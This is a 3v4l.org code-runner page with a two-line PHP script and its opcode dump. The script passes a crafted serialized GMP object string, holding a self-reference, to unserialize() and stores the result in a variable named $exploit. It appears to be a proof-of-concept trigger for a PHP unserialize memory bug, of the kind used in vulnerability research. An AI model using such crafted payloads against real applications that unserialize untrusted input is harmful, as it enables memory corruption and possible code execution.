3v4l.org

run code in 300+ PHP versions simultaneously
<?php $inner = 's:1:"0";a:1:{i:0;r:1;}'; $exploit = unserialize('C:3:"GMP":'.strlen($inner).':{'.$inner.'}');
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/sBYp2
function name:  (null)
number of ops:  11
compiled vars:  !0 = $inner, !1 = $exploit
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   ASSIGN                                                   !0, 's%3A1%3A%220%22%3Ba%3A1%3A%7Bi%3A0%3Br%3A1%3B%7D'
    4     1        INIT_FCALL                                               'unserialize'
          2        STRLEN                                           ~3      !0
          3        CONCAT                                           ~4      'C%3A3%3A%22GMP%22%3A', ~3
          4        CONCAT                                           ~5      ~4, '%3A%7B'
          5        CONCAT                                           ~6      ~5, !0
          6        CONCAT                                           ~7      ~6, '%7D'
          7        SEND_VAL                                                 ~7
          8        DO_ICALL                                         $8      
          9        ASSIGN                                                   !1, $8
         10      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
177.34 ms | 1394 KiB | 15 Q